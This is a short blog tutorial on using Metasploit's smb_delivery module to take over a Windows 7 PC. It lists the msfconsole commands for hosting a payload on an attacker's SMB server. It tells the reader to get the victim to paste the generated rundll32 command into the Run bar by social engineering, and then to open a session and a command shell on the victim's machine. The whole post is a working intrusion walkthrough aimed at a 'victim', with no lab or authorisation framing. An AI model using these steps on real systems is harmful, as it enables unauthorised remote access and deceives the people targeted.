This module serves payloads
via an SMB server and provides commands to retrieve and execute the generated
payloads. Currently supports DLLs and Powershell.
Exploit Targets
Windows 7
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open
Kali terminal type msfconsole
Now
type use exploit/windows/smb/smb_delivery
msf exploit (smb_delivery)>set srvhost
192.168.1.101 (IP of Local Host)
msf exploit (smb_delivery)>set srvport 445
msf exploit (smb_delivery)>exploit
Now,
we have to copy the rundll32.exe code
generated in victim’s run bar on PC using social engineering method.
As
soon as we do that, we will get access of victim’s PC.
Now
type sessions –i to display sessions opened when the
victim opens the link
Now
the session has opened type sysinfo to
get system information, then type shell to
enter into Victims command prompt.
0 comments:
Post a Comment